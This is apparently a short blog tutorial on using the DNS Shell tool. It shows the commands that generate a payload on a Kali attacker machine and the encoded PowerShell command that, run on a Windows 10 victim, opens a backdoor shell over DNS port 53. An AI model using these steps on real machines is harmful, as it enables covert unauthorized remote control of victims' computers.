
Ready to Start Your Career?

By: gurubaran
December 31, 2017
DNS Shell – Tool to Compromise & Maintain Control of Victim Machines
By: gurubaran
December 31, 2017

By: gurubaran
December 31, 2017

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)
ATTACKER MACHINE
- Download the DNS SHELL tool here.
- Execute the command: python DNS-SHELL.py

- It can be utilized with different modes, Recursive mode (It will run the DNS name) and Direct mode will run as Ip address provided (Kali Linux IP)
Generating Payload – DNS Shell

- Above Figure is Recursive mode.
- Recursive Command Executed: Python DNS-Shell.py -l -r <Domain Name>
NOTE: Command to be executed for direct mode: Python DNS-Shell.py -l -d
- Above figure shows recursive mode has generated payload.
Victims Machine
- Run & Execute the Command with CMD: Powershell.exe -e <Copy and paste the Generated Payload HERE>

BACK TO ATTACKERS MACHINE
- Once the payload is executed in victims machine. Shell of Windows 10 machine is obtained.

- Above Figure shows destination (windows 10) now acts as backdoor and command is entered and turns to Convert Channel to over port 53 of DNS.Happy Hacking !!!
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry